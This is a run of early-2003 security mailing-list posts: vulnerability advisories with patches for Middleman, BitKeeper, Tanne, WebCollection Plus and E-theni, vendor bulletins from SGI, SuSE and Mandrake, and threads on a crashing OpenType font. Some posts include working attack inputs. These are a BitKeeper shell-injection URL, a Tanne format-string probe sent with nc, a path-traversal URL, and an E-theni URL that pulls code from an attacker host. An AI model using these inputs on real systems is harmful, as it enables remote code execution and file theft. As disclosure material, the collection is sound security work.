middleman-1.2 and prior off-by-one bug
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 QITEST1 SECURITY ADVISORY #006 middleman-1.2 and prior off-by-one bug PROGRAM DESCRIPTION Middleman is a powerful proxy server with many features designed to make browsing the Internet a more pleasant experience. It can do much more than just proxying though; it can be used as a layer between any web server and client to filter HTTP requests, or act as a portal between an internal network and the Internet. It has an intuitive Web interface that provides an easy way of accessing and changing the proxy's configuration, there's no need to dig through any complicated configuration files. (quoted from its README.html) VULNERABILITY DESCRIPTION The program is affected by an ebp corruption condition in the routine performing the dns lookup of the hostname provided in the request, because its own implementation of strncpy goes off by one. The bug could be easily exploited by a remote attacker, leading to a root shell if the daemon runs as root (it's really nice that the sample rc init file provided calls the daemon without dropping privileges, which is one of its features). If exploitation is not successful, it will result in a denial of service, because the program will die at all. DETAILS In src/misc.c: /* strncpy which always NULL terminates */ char *s_strncpy(char *d, char *s, size_t len) { char *dest = d; for (; len && (*dest = *s); s++, dest++, len--); *dest = '\0'; return d; } No doubt. It always NULL terminates. But even off by one. In src/networks.c near line 614 we find: /* perform a dns lookup, using cached response from a previous lookup if possible */ HOSTENT *net_dns(char *host) { time_t t; char *string, hst[128], buf[24]; HOSTENT *hostent; Looking to this code we could think the memory layout on the stack for this function is the following: hst[128]| string[4] | t[4]| ebp | eip V In src/networks.c near line 627 we find: s_strncpy(hst, host, 128); We know that s_strncpy puts its final 0x00 off by one. This fact, apparently, should not be a real problem, because the 0x00 byte should be put on the lsb of string. Where is the bug? Due to compilation (maybe optimization), those variables get allocated in a different way: (I dumped this from the program) ** net_dns(): &hst 0xbf7ff9f4 &string 0xbf7ff9d4 &t 0xbf7ff9d8 So the real memory layout is: string[4] | t[4]| hst[128]| ebp | eip V So we have ebp corruption. Let's have a memory dump: ** net_dns(): 0xbf7ff9f4 -> 0xbfffc0d3 (0) ** net_dns(): 0xbf7ff9f8 -> 0xbfffc0d3 (1) ** net_dns(): 0xbf7ff9fc -> 0xbfffc0d3 (2) [...] ** net_dns(): 0xbf7ffa70 -> 0xbfffc0d3 (31) ** net_dns(): 0xbf7ffa74 -> 0xbf7ffa00 (32) ** net_dns(): 0xbf7ffa78 -> 0x804db07 (33) At 0xbf7ffa78 we have 0x804db07: that's the eip. Indeed: (gdb) x 0x804db07 0x804db07 : 0xc483c289 net_connect() effectively calls net_dns() At 0xbf7ffa74 there is the corrupted ebp. At 0xbf7ffa00 + 4 the execution flow will search an eip: ** net_dns(): 0xbf7ffa04 -> 0xbfffc0d3 (4) We can control the data contained at that address, which can obviously be a pointer to our code. But there's no need to explain here how this kind of vulnerability can be exploited: it's quite trivial. I think this kind of problems should be seriously valued, because they are difficult to be detected and prevented. But they can be avoided by simply checking that the program never goes off by one, even if the buffer is not immediately before the ebp: indeed there could be a condition like that I described. CREDITS h2so4 - support and connectivity SOLUTION Apply the following patch. 8< - --- middleman/src/misc.c 2002-10-19 19:07:24.0 +0200 +++ middleman-patched/src/misc.c2003-01-10 11:29:08.0 +0100 @@ -27,17 +27,34 @@ #include #include "proto.h" - -/* - -strncpy which always NULL terminates - -*/ - -char *s_strncpy(char *d, char *s, size_t len) - -{ - - char *dest = d; - - - - for (; len && (*dest = *s); s++, dest++, len--); - - *dest = '\0'; + /* Adapted version of OpenBSD strlcpy */ +char * +s_strncpy(dst, src, siz) + char *dst; + char *src; + size_t siz; +{ + register char *d = dst; + register const char *s = src; + register size_t n = siz; + + /* Copy as many bytes as will fit */ + if (n != 0 && --n != 0) { + do { + if ((*d++ = *s++) == 0) + break; + } while (--n != 0); + } + + /* Not enough room in dst, add NUL and traverse rest of src */ + if (n == 0) { + if (siz != 0) + *d = '\0'; /* NUL-terminate dst */ + while (*s++) + ; + } -
BitKeeper remote shell command execution/local vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Synopsis:BitKeeper remote shell command execution/local vulnerability Product: BitKeeper (http://www.bitkeeper.com) Version: 3.0.x Author: Maurycy Prodeus <[EMAIL PROTECTED]> Date:11 November 2002 Issue: - -- BitKeeper is a source management software. It contains a shell argument parsing vulnerability that leads remote attacker to run arbitrary shell commands on system where BitKeeper listens to HTTP requests. Details: - 1. Remote command execution BitKeeper may be executed in daemon mode then it opens port and listens to incoming requests. BitKeeper provides remote users with access to project resources through web interface. It calls external diff binary as a parameter to shell -c option which is susceptible to shell metacharacter injection. 2. Locally exploitable race condition Second vulnerability is in temporary file handling also during calling external programs. Piece of strace output: 20495 getpid() = 20495 20495 lstat("/tmp/foo.c-1.1-20495", 0xbfffae9c) = -1 ENOENT (No such file or directory) 20495 lstat("/tmp", {st_mode=S_IFDIR|S_ISVTX|0777, st_size=16384, ...}) = 0 20495 open("/tmp/foo.c-1.1-20495", O_WRONLY|O_CREAT|O_TRUNC, 0666) = 8 There is race condition vulnerability after BitKeeper stats the file and before the file is opened. Additionally it is created with insecure priviledges. Impact: - --- If BitKeeper is running in daemon mode and listens to incoming requests, remote attacker can execute arbitrary commands on system with its priviledges. Local attacker can additionaly get access to temporary files which may cause taken over control of the program. Vendor Status: - -- November 12, 2002Vendor has been contacted November 12, 2002First answer November 27, 2002Information about pre-release December 10, 2002Last email While coordinating date of publishing this advisory, they stop responding to my emails. Exploit: - If BitKeeper is run as stand-alone daemon, link: http://somehost.com:port/ diffs/foo.c@%27;echo%20%3Eiwashere%27?nav=index.html|src/|hist/foo.c should create file named "iwashere" in project root directory. - -- Maurycy Prodeus iSEC Security Research http://isec.pl/ -BEGIN PGP SIGNATURE- Version: GnuPG v1.0.7 (GNU/Linux) iD8DBQE+IBbnC+8U3Z5wpu4RAkM6AKDEeTh1akZ5TfdWkvw2xaHBkgXIRwCglXYQ sjzfB4azJzMu7wJTScSllvg= =O+nl -END PGP SIGNATURE-
Re: Opentype font file causes Windows to restart.
[Since my first attempt yesterday was not approved by the BugTraq moderator, I'm trying it again, this time in a slightly different format and CC'ing vulnwatch, too.] The problem is due to "incorrect" data in the "CFF" table of this font - for details, please see the attached message I sent to the OpenType mailing list (http://www.topica.com/lists/opentype - note that I have omitted the attachment to this message, which was Andrew's original BugTraq posting). This specific flavor of an OpenType font (CFF outlines, i.e. "PostScript" data) is only supported natively by Windows 2000 and later. For previous Windows versions, you need ATM (Adobe Type Manager) to display such a font. Please note that the crash only occurs when trying to render the "o" character (that's what fontview.exe tries to do, of course). As far as the creation of an embedded font for IE (.eot, embedded OpenType) is concerned, I'm not sure if it's possible to trigger the bug this way. When installing the "restarter" font and listing the fonts available for embedding in WEFT, Microsoft's Web Embedding Fonts Tool (the only publicly available tool I know of to create such fonts), OpenType fonts with CFF outline data do not appear in the list of available fonts. I suppose WEFT is currently limited to embed OpenType fonts with TrueType outlines ("glyf" table) or plain PostScript Type 1 fonts (.pfb file suffix). The .eot format is not documented, as far as I know, so creating such a font manually would probably require quite some experimenting, and even then the question remains if IE would actually be able to deal with this font format and display the characters. Kaspar --- Begin Message --- This was recently posted to BugTraq (a mailing list about computer security vulnerabilities, for those who don't know). Further inspection of the font file shows that the problem is in the CFF table - or more exactly, within the "o" character. Disassembling the font with Just's excellent TTX (http://fonttools.sourceforge.net) produces the following result for the "o" character: 10 290 rmoveto 6 -1 7 1 2 -1 -1 -1 -1 -4 1 -4 1 -3 1 -5 1 -3 1 -5 1 -3 1 -4 1 -1 1 1 1 4 1 2 1 5 1 2 1 4 1 5 -1 5 -1 2 -1 2 -1 1 14 -1 -1 -7 1 -5 1 -4 1 -5 1 -3 1 -4 1 -4 2 2 1 4 1 4 1 3 1 5 1 4 1 4 1 6 -1 1 10 -1 -1 -2 -1 -1 -1 -5 -1 -2 -1 -4 -1 -3 -1 -4 -1 -3 -1 -3 -1 -4 -1 -3 -1 -4 -1 -3 -1 -3 -1 -1 -8 2 -1 3 -1 5 -1 3 -1 4 -1 3 -1 4 -2 -2 -1 -4 -1 -3 -1 -4 -1 -3 -1 -4 -1 -3 -1 -1 -8 1 -1 4 -1 3 -1 4 -1 3 -1 4 -1 3 -1 3 -1 4 -1 3 -1 4 -1 3 -1 4 -1 2 -1 1 -1 1 hlineto 69 hmoveto 8 -1 28 -9 -1 2 -1 1 -3 1 -17 -1 -1 -13 14 2 1 1 1 -12 -2 2 -1 1 -13 -16 20 1 1 1 1 1 1 2 1 2 1 -8 -1 -4 -37 1 1 1 1 43 -2 2 hlineto 223 hmoveto 16 -1 4 -1 2 -10 1 -3 -2 3 -1 1 -1 1 -1 1 -1 1 -2 1 -2 1 -11 -1 -2 -1 -2 -1 -1 -1 -1 -1 -1 -1 -1 -2 -1 -2 -1 -7 -1 -2 1 -6 1 -3 1 -1 1 -2 1 -1 1 -1 1 -1 1 -1 2 -1 3 -1 4 1 3 1 1 1 1 1 1 3 1 6 -1 2 -2 1 -2 1 7 -1 1 1 2 -1 1 1 6 -1 -1 -1 -1 -2 -1 -17 -4 2 -1 2 -2 -1 -1 -1 -1 -1 -2 -1 -2 -1 -4 -1 -7 1 -4 1 -3 1 -2 1 -1 1 -1 1 -1 1 -1 1 -1 1 -1 1 -1 2 -1 2 -1 3 -1 14 1 3 1 2 1 2 1 1 1 1 1 1 1 1 1 1 1 1 1 1 2 1 2 1 2 1 3 1 hlineto [... some more hmoveto/hlineto stuff deleted ...] endchar Some simple experiments modifying this Charstring and reassembling the font with TTX showed that the crash is caused by the arguments to the hlineto operator. The Type 2 charstring specification (http://partners.adobe.com/asn/developer/pdfs/tn/5177.Type2.pdf) defines an implementation limit of 48 for the argument stack (Appendix B, p.33) - but in some cases, the number of arguments to the hlineto operator in this particular Charstring clearly exceed this limit. In the end, this apparently leads to a page fault (i.e. a "blue screen") in ATMFD.DLL (the Type1/CFF font driver) - which shouldn't happen in any case, of course. I guess the folks at Adobe need to fix this. BTW, checking the font with CFFChecker from the OpenType FDK gives a "Type 2 stack overflow" for this character (which is not really surprising, is it?). Kaspar --- End Message ---
Multiple Vulnerabilities in Sendmail on IRIX
-BEGIN PGP SIGNED MESSAGE- __ SGI Security Advisory Title: Multiple Vulnerabilities in Sendmail Number : 20030101-01-P Date : January 6, 2003 Reference: CVE CAN-2002-1165 Reference: iDEFENSE Security Advisory 10.01.02 Reference: SGI BUG 869098 875386 Fixed in : IRIX 6.5.19 or patch 4911 __ - --- - --- Issue Specifics --- - --- This bulletin addresses two vulnerabilities that exist in SGI supplied versions of sendmail: o sendmail's smrsh restrictions can be bypassed by a local user, possibly gaining root access. See the following URLs for additional information: http://www.idefense.com/advisory/10.01.02.txt http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1165 o sendmail's "check_relay" for IP addresses can be circumvented using bogus DNS data http://www.sendmail.org/ has more details in "Recent News (2002-Dec-03)" SGI has investigated the issue and recommends the following steps for neutralizing the exposure. It is HIGHLY RECOMMENDED that these measures be implemented on ALL vulnerable SGI systems. These issues have been corrected with a patch and in future releases of IRIX. - -- - --- Impact --- - -- The sendmail binary is installed by default on IRIX 6.5 systems as part of eoe.sw.base. To determine the version of IRIX you are running, execute the following command: # /bin/uname -R That will return a result similar to the following: # 6.5 6.5.16f The first number ("6.5") is the release name, the second ("6.5.16f" in this case) is the extended release name. The extended release name is the "version" we refer to throughout this document. - - --- Temporary Workaround --- - There is no effective workaround available for these problems. SGI recommends either upgrading to IRIX 6.5.19 when released, or installing the appropriate patch from the listing below. - - --- Solution --- - SGI has provided a series of patches for these vulnerabilities. Our recommendation is to upgrade to IRIX 6.5.19 when available, or install the appropriate patch. OS Version Vulnerable? Patch # Other Actions -- --- --- - IRIX 3.xunknown Note 1 IRIX 4.xunknown Note 1 IRIX 5.xunknown Note 1 IRIX 6.0.x unknown Note 1 IRIX 6.1unknown Note 1 IRIX 6.2unknown Note 1 IRIX 6.3unknown Note 1 IRIX 6.4unknown Note 1 IRIX 6.5 yes Notes 2 & 3 IRIX 6.5.1yes Notes 2 & 3 IRIX 6.5.2yes Notes 2 & 3 IRIX 6.5.3yes Notes 2 & 3 IRIX 6.5.4yes Notes 2 & 3 IRIX 6.5.5yes Notes 2 & 3 IRIX 6.5.6yes Notes 2 & 3 IRIX 6.5.7yes Notes 2 & 3 IRIX 6.5.8yes Notes 2 & 3 IRIX 6.5.9yes Notes 2 & 3 IRIX 6.5.10 yes Notes 2 & 3 IRIX 6.5.11 yes Notes 2 & 3 IRIX 6.5.12 yes Notes 2 & 3 IRIX 6.5.13 yes Notes 2 & 3 IRIX 6.5.14 yes Notes 2 & 3 IRIX 6.5.15 yes 4911 Notes 2, 4 & 5 IRIX 6.5.16 yes 4911 Notes 2, 4 & 5 IRIX 6.5.17 yes 4911 Notes 2, 4 & 5 IRIX 6.5.18 yes 4911 Notes 2, 4 & 5 IRIX 6.5.19no NOTES 1) This version of the IRIX operating has been retired. Upgrade to an actively supported IRIX operating system. See http://support.sgi.com/irix/news/index.html#policy for more information. 2) If you have not received an IRIX 6.5.X CD for IRIX 6.5, contact your SGI Support Provider or URL: http://support.sgi.com/irix/swupdates/ 3) Upgrade to IRIX 6.5.15 or later and install the patch, or upgrade to IRIX 6.5.19 when released. 4) Install patch 4911 5) You should also use the workarounds noted in SGI Security Advisory 20011101-01-I # Patch File Checksums The actual patch will be a tar file containing the following files: Filename: README.patch.4911 Algorithm #1 (sum -r):61910 9 README.patch.4911 Algorithm #2 (sum): 20270 9 README.patch.4911 MD5 che
SuSE Security Announcement: libpng (SuSE-SA:2003:0004)
-BEGIN PGP SIGNED MESSAGE- __ SuSE Security Announcement Package:libpng Announcement-ID:SuSE-SA:2003:0004 Date: Tuesday, Jan 14th 2003 11:00 MEST Affected products: 7.1, 7.2, 7.3, 8.0, 8.1 SuSE Linux Database Server SuSE eMail Server 3.1 SuSE eMail Server III SuSE Firewall Adminhost VPN SuSE Linux Admin-CD for Firewall SuSE Firewall on CD 2 - VPN SuSE Firewall on CD 2 SuSE Linux Enterprise Server for S/390 SuSE Linux Connectivity Server SuSE Linux Enterprise Server 7 SuSE Linux Enterprise Server 8 SuSE Linux Office Server UnitedLinux 1.0 Vulnerability Type: possible remote compromise Severity (1-10):4 SuSE default package: yes Cross References: CAN-2002-1363 Content of this advisory: 1) security vulnerability resolved: wrong offset calculation problem description, discussion, solution and upgrade information 2) pending vulnerabilities, solutions, workarounds: - fam - xpdf - libmcrypt 3) standard appendix (further information) __ 1) problem description, brief discussion, solution, upgrade information The library libpng provides several functions to encode, decode and manipulate Portable Network Graphics (PNG) image files. Due to wrong calculation of some loop offset values a buffer overflow can occur. The buffer overflow can lead to Denial-of-Service or even to remote compromise. After updating libpng all applications that use libpng should be restarted. Due to the fact that a lot of applications are linked with libpng it may be necessary to switch to runlevel S and back to the previous runlevel or even to reboot the system. There is no temporary fix known. Please install the new packages from our FTP servers. Please download the update package for your distribution and verify its integrity by the methods listed in section 3) of this announcement. Then, install the package using the command "rpm -Fhv file.rpm" to apply the update. Our maintenance customers are being notified individually. The packages are being offered to install from the maintenance web. Intel i386 Platform: SuSE-8.1: ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/libpng-1.2.4-58.i586.rpm 7d21806e31c16a9c4bf351b303ce81aa patch rpm(s): ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/libpng-1.2.4-58.i586.patch.rpm 3efc4170990f081117c8106efd7bed33 source rpm(s): ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/libpng-1.2.4-58.src.rpm a24985f7c0bb5a54c87115a7944a87cf SuSE-8.0: ftp://ftp.suse.com/pub/suse/i386/update/8.0/gra1/libpng-2.1.0.12-160.i386.rpm 13d9eef080381224c1e4e0d168401a27 patch rpm(s): ftp://ftp.suse.com/pub/suse/i386/update/8.0/gra1/libpng-2.1.0.12-160.i386.patch.rpm fc75c7843967f914810520bc0d63503b source rpm(s): ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/libpng-2.1.0.12-160.src.rpm 0269d8c6fa56109120d5933fd914b82b SuSE-7.3: ftp://ftp.suse.com/pub/suse/i386/update/7.3/gra1/libpng-2.1.0.12-160.i386.rpm 707082f5742ee15ed94de2df066963a2 source rpm(s): ftp://ftp.suse.com/pub/suse/i386/update/7.3/zq1/libpng-2.1.0.12-160.src.rpm 1206600c361fefc09efb83887203d00a SuSE-7.2: ftp://ftp.suse.com/pub/suse/i386/update/7.2/gra1/libpng-2.1.0.10-57.i386.rpm 9a6ee6c1a3344be521398aca8b613f03 source rpm(s): ftp://ftp.suse.com/pub/suse/i386/update/7.2/zq1/libpng-2.1.0.10-57.src.rpm c5fe80f3683a1c62e9ae84c4e1541e5a SuSE-7.1: ftp://ftp.suse.com/pub/suse/i386/update/7.1/gra1/libpng-2.1.0.8-17.i386.rpm d2e6e198fdbe2e3bb0a3ba2b8dc3e524 source rpm(s): ftp://ftp.suse.com/pub/suse/i386/update/7.1/zq1/libpng-2.1.0.8-17.src.rpm 024121c035b54982ea5b8394804cc796 Sparc Platform: SuSE-7.3: ftp://ftp.suse.com/pub/suse/sparc/update/7.3/gra1/libpng-2.1.0.12-99.sparc.rpm 305317e07da2749b6d198d4899c4313c source rpm(s): ftp://ftp.suse.com/pub/suse/sparc/update/7.3/zq1/libpng-2.1.0.12-99.src.rpm 2d4302f4b6a4fb29d392aef053539fc4 AXP Alpha Platform: SuSE-7.1: ftp://ftp.suse.com/pub/suse/axp/update/7.1/gra1/libpng-2.1.0.8-24.alpha.rpm 970e51672298667
RE: Opentype font file causes Windows to restart.
Windows98 - No reboot. -Original Message- From: Andrew [mailto:[EMAIL PROTECTED]] Sent: Monday, January 06, 2003 10:37 AM To: [EMAIL PROTECTED]; [EMAIL PROTECTED] Subject: Opentype font file causes Windows to restart. Problem --- The attached OpenType font file will cause Windows to restart immediately when the file is opened by the default viewer (fontview). I doubt anyone would suspect a "harmless" little font file of being able to cause such a thing to happen! Software affected - It has been tested on both Windows 2000 and Windows XP with exactly the same result -- an immediate restart. Other versions of Windows are untested. Fix --- No fix known. - Andrew Connell
[INetCop Security Advisory] Remote format string vulnerability in Tanne.
INetCop Security Advisory #2003-0x82-012 * Title: Remote format string vulnerability in Tanne. 0x01. Description About: tanne is a small, secure session-management solution for HTTP. It replaces common sessions with a system consisting of PIN and TANs, well known from online banking. It's main purpose is to enable programmers of Web applications to have real secure sessions without cookies or session-ids. More detailed information is http://tanne.fluxnetz.de/. Vulnerability can presume as following. There is logger() function to 29 lines of 'netzio.c' code. __ 59 else 60 { 61 va_start( args, str ); 62 vsnprintf( txt, 511, str, args ); 63 va_end( args ); 64 openlog( "Tanne2", LOG_PID, LOG_DAEMON ); 65 syslog( LOG_INFO, txt ); // Here. 66 closelog(); 67 } 68 umask( NORMALE_UMASK ); 69 #else 70 va_start( args, str ); 71 vsnprintf( txt, 511, str, args ); 72 va_end( args ); 73 openlog( "Tanne2", LOG_PID, LOG_DAEMON ); 74 syslog( LOG_INFO, txt ); // Here. 75 closelog(); 76 #endif 77 } -- This is very dangerous security vulnerability. It's known already well. ;-) 0x02. Vulnerable Packages Vendor site: http://tanne.fluxnetz.de/ tanne 0.6.17 -tanne-0.6.17.tar.bz2 +Linux +Other 0x03. Exploit When compile and tested, bring following result. bash# netstat -an | grep 14002 tcp0 0 127.0.0.1:14002 0.0.0.0:* LISTEN bash# nc 0 14002 %x%x%x%x |F| bash# tail -1 /var/log/messages Jan 5 11:29:55 xpl017elz Tanne2[3540]: FATAL: ID (804bbc0118b980) nicht gefunden bash# If our examination ends, exhibit exploit code for proof of concept. hehe !! 0x04. Patch === netzio.patch === --- netzio.cWed Jul 25 22:17:29 2001 +++ netzio.patch.c Sun Jan 5 11:18:31 2003 @@ -62,7 +62,7 @@ vsnprintf( txt, 511, str, args ); va_end( args ); openlog( "Tanne2", LOG_PID, LOG_DAEMON ); - syslog( LOG_INFO, txt ); + syslog( LOG_INFO, "%s", txt ); closelog(); } umask( NORMALE_UMASK ); @@ -71,7 +71,7 @@ vsnprintf( txt, 511, str, args ); va_end( args ); openlog( "Tanne2", LOG_PID, LOG_DAEMON ); - syslog( LOG_INFO, txt ); + syslog( LOG_INFO, "%s", txt ); closelog(); #endif } === eof === P.S: Sorry, for my poor english. -- By "dong-houn yoU" (Xpl017Elz), in INetCop(c) Security. MSN & E-mail: szoahc(at)hotmail(dot)com, xploit(at)hackermail(dot)com INetCop Security Home: http://www.inetcop.org (Korean hacking game) My World: http://x82.i21c.net GPG public key: http://wizard.underattack.co.kr/~x82/h0me/pr0file/x82.k3y -- -- ___ Get your free email from http://www.hackermail.com Powered by Outblaze
Re: ps information leak in FreeBSD
On Thu, Jan 09, 2003 at 02:48:30PM +1100, Damien Miller wrote: > Crist J. Clark wrote: > >Any program that asks for a password on the command line should have > >the common decency to overwrite/obfuscate it, along the lines of, > > case 'p': > > passwd = optarg; > > optarg = ""; > > break; This code is incorrect, it destroys a temporary pointer that will be overwritten with the next call to getopt(). For the sake of completeness, it should be noted that to actually destroy the command line argument data, one should do something along the lines of: case 'p': passwd = strdup(optarg); /* now requires free()ing. */ { int len = strlen(optarg), i; for (i = 0; i != len; ++i) optarg[i] = 0; } > That works only for OSs which support argv clobbering - it is by no > means portable and shouldn't be depended on for security. This is still correct though. :). Any passwords passed on the command line are available through a race anyway. Just don't do it(tm). David.
Vulnerability in WebCollection Plus (TM)
These vulnerabilities were found / tested on: WebCollection Plus (TM) Copyright 2001 Follett Software Company Version 5.00 Revision 12-01-A Dec 19 2001 Program protects from reading other non-webserver accessible files by checking for a : or excessive .'s in a string. If the URL has a / at the beginning, it has the affect of reading from C:\ for example, to read C:\bootlog.txt the URL to use is something like http://vulnerableserver/wx/s.dll?d=/bootlog.txt Found the latest version revision is 5.05, but could not find a 5.05 copy to test on. Manufacturer of program was contacted by Phone, and the vulnerability was reported to them. Follet Software has not replied concerning not being submitted to bugtraq, so I have to assume they do not care. f0urtyfive www.ceteranet.com
RE: Opentype font file causes Windows to restart.
Tested on Windows NT4 SP6a. Had to force opening with fontview as it was not associated by default. No restart, just message "Not a valid font file". -Original Message- From: Andrew [mailto:[EMAIL PROTECTED]] Sent: 06 January 2003 15:37 To: [EMAIL PROTECTED]; [EMAIL PROTECTED] Subject: Opentype font file causes Windows to restart. Problem --- The attached OpenType font file will cause Windows to restart immediately when the file is opened by the default viewer (fontview). I doubt anyone would suspect a "harmless" little font file of being able to cause such a thing to happen! Software affected - It has been tested on both Windows 2000 and Windows XP with exactly the same result -- an immediate restart. Other versions of Windows are untested. Fix --- No fix known. - Andrew Connell
Re: A security vulnerability in S8Forum
On Tue, 2003-01-07 at 03:20, Steve Watt wrote: > In article <[EMAIL PROTECTED]> you >write: > [ snip ] > >SOLUTION : > >== > [ snip ] > > if(!eregi("^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[a-z0-9-]+(\.[a-z0-9-]+)*(\.[a-z]{2,3})$", > >$email) && $email != > >"") { > > Please note that there are many more characters valid in the LHS of an > email address, for example +, that are often desirable. Disallowing > such addresses is a major nuisance. Indeed. In fact, ANY ASCII character can appear in the local-part of the address, because the local part can be a quoted-string and a quoted-string can contain any virtually any ASCII. Then, the domain can be a domain-literal, and this can contain CFWS, which can contain comments. Comments cannot be recognised by a regular expression as comments nest. RFC 2822 address validation requires knowlege of that standard. David Wilson Isode Limited
E-theni (PHP)
Informations : °° Version : ? Website : http://www.theni.freesurf.fr Problems : - Include file - phpinfo() PHP Code/Location : °°° /admin_t/include/aff_liste_langue.php : - require ($rep_include."para_langue.php"); - /admin_t/include/find_theni_home.php : -- phpinfo(); ?> -- Exploits : °° - http://[target]/admin_t/include/aff_liste_langue.php?rep_include=http://[attacker]/ with : http://[attacker]/para_langue.php (This will work only if register_globals=ON) - http://[target]/admin_t/include/find_theni_home.php Patchs : In admin_t/include/aff_liste_langue.php, replace the line : - require ($rep_include."para_langue.php"); - by : - if (file_exists($rep_include."para_langue.php")){ require ($rep_include."para_langue.php"); } - & To replace the file /admin_t/include/find_theni_home.php by : -- session_start(); if (session_is_registered("USER")==FALSE or $USER[id_user]<1){ exit; } else { echo ""; echo ""; phpinfo(); echo ""; } ?> -- A patch can be found on http://www.phpsecure.org. More details : °° In French : http://www.frog-man.org/tutos/E-theni.txt Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FE-theni.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools frog-m@n _ MSN Messenger : discutez en direct avec vos amis ! http://www.msn.fr/msger/default.asp
MDKSA-2003:004 - Updated KDE packages fix multiple vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Mandrake Linux Security Update Advisory Package name: kde Advisory ID:MDKSA-2003:004 Date: January 13th, 2003 Affected versions: 8.1, 8.2, 9.0 Problem Description: Multiple instances of improperly quoted shell command execution exist in KDE 2.x up to and including KDE 3.0.5. KDE fails to properly quote parameters of instructions passed to the shell for execution. These parameters may contain data such as filenames, URLs, email address, and so forth; this data may be provided remotely to a victim via email, web pages, files on a network filesystem, or other untrusted sources. It is possible for arbitrary command execution on a vulnerable system with the privileges of the victim's account. The code audit by the KDE team resulted in patches for KDE 2.2.2 and KDE 3; version 3.0.5a was released and the KDE team encourages the upgrade. The listed KDE2 packages have the KDE team's patches applied to provide the fixed code. References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1393 http://www.kde.org/info/security/advisory-20021220-1.txt Updated Packages: Mandrake Linux 8.1: 48ff0cb4379dc637269bc80620daa1a9 8.1/RPMS/arts-2.2.1-6.2mdk.i586.rpm 46d9f094efbe6cc27db14c38cd606795 8.1/RPMS/kdebase-2.2.1-7.1mdk.i586.rpm 69f8e2273fa0a358d9654a0d3203e7e3 8.1/RPMS/kdebase-devel-2.2.1-7.1mdk.i586.rpm 73362000c7976994348495fb32e500b3 8.1/RPMS/kdebase-nsplugins-2.2.1-7.1mdk.i586.rpm 468112d4056dfc58ca8b58c4f1ec7be1 8.1/RPMS/kdebase-static-devel-2.2.1-7.1mdk.i586.rpm 91d004309794e010904852e156071b70 8.1/RPMS/kdegames-2.2.1-1.1mdk.i586.rpm d40cd6f4d25a5bfa474f5433050a68c4 8.1/RPMS/kdegames-devel-2.2.1-1.1mdk.i586.rpm 9fa32248695753cb321682d5ec49ade3 8.1/RPMS/kdegames-static-devel-2.2.1-1.1mdk.i586.rpm 28eb522af6e204b188e2b28df3a036e4 8.1/RPMS/kdegraphics-2.2.1-2.2mdk.i586.rpm 741393cf8b937154b009130c7ffdda5e 8.1/RPMS/kdegraphics-static-devel-2.2.1-2.2mdk.i586.rpm b500613060b86576b4e84ad496eae977 8.1/RPMS/kdelibs-2.2.1-6.2mdk.i586.rpm 24cd581953daa85f4f5990d50a45a972 8.1/RPMS/kdelibs-devel-2.2.1-6.2mdk.i586.rpm 8ca76fe8e649759911906aae876cedbc 8.1/RPMS/kdelibs-sound-2.2.1-6.2mdk.i586.rpm f61e9869d03148ed43c170eaac0d72dc 8.1/RPMS/kdelibs-static-devel-2.2.1-6.2mdk.i586.rpm 8e4ff760a9d0a0e77e1a0824ea4d5d97 8.1/RPMS/kdemultimedia-2.2.1-2.1mdk.i586.rpm d2ecc0f681a7fa733da5b2a1f13cf154 8.1/RPMS/kdemultimedia-aktion-2.2.1-2.1mdk.i586.rpm fc7da8ce233b36efc6a90717e1944d22 8.1/RPMS/kdemultimedia-devel-2.2.1-2.1mdk.i586.rpm c646a64a09659f3fe0f817a96c661c30 8.1/RPMS/kdemultimedia-static-devel-2.2.1-2.1mdk.i586.rpm 1a81e958d09f2dda4bc676d9edbbec97 8.1/RPMS/kdenetwork-2.2.1-2.1mdk.i586.rpm d11dacd9de9e40e9424e74253145e21b 8.1/RPMS/kdenetwork-devel-2.2.1-2.1mdk.i586.rpm 444a049090631eb2b87f06a1ddaa5938 8.1/RPMS/kdenetwork-static-devel-2.2.1-2.1mdk.i586.rpm a47f01c1fb4a8346bb91ddb29c1f1e8f 8.1/RPMS/kdepim-2.2.1-1.1mdk.i586.rpm 1a2e4c66bf22e8b035f110b5583643be 8.1/RPMS/kdepim-devel-2.2.1-1.1mdk.i586.rpm d12a88cf1c37f0b636719de604e0c98e 8.1/RPMS/kdesdk-2.2.1-1.1mdk.i586.rpm 92aee5b55d89cd9a1233d4f9d4a63475 8.1/RPMS/kdesdk-devel-2.2.1-1.1mdk.i586.rpm 0186a161325c0d2f1180429fbb2ff1f7 8.1/RPMS/kdesdk-static-devel-2.2.1-1.1mdk.i586.rpm c410e2f2a3854abcc10e45ec442f1131 8.1/RPMS/kdeutils-2.2.1-2.1mdk.i586.rpm c5f90c1763c6a49b1b7043a1f1777aa1 8.1/RPMS/kdeutils-devel-2.2.1-2.1mdk.i586.rpm ac44479d46b23aec1a83d7ccaeab70cc 8.1/RPMS/kdeutils-static-devel-2.2.1-2.1mdk.i586.rpm 27c6db5818b359e05c1c14ad0fa2449f 8.1/RPMS/libarts2-2.2.1-6.2mdk.i586.rpm 52b3ac653c8fc6dc301afb14d06e6968 8.1/RPMS/libarts2-devel-2.2.1-6.2mdk.i586.rpm 8291a6cb79bd1ea80ea09ea1720c5f6f 8.1/SRPMS/kdebase-2.2.1-7.1mdk.src.rpm 305e43b02c77715f622782ce347217f7 8.1/SRPMS/kdegames-2.2.1-1.1mdk.src.rpm 1fba584f4b40c5139d7ec0a88d1cc39c 8.1/SRPMS/kdegraphics-2.2.1-2.2mdk.src.rpm 717de8d0650c6cf5f548098d5a1b62e7 8.1/SRPMS/kdelibs-2.2.1-6.2mdk.src.rpm 81f058cd556e82801463badb2e8bf5ae 8.1/SRPMS/kdemultimedia-2.2.1-2.1mdk.src.rpm cf541f6d78eb5fe7742b35aa1d5c35b8 8.1/SRPMS/kdenetwork-2.2.1-2.1mdk.src.rpm 95ff817aa54020e50dd77b55a68220cc 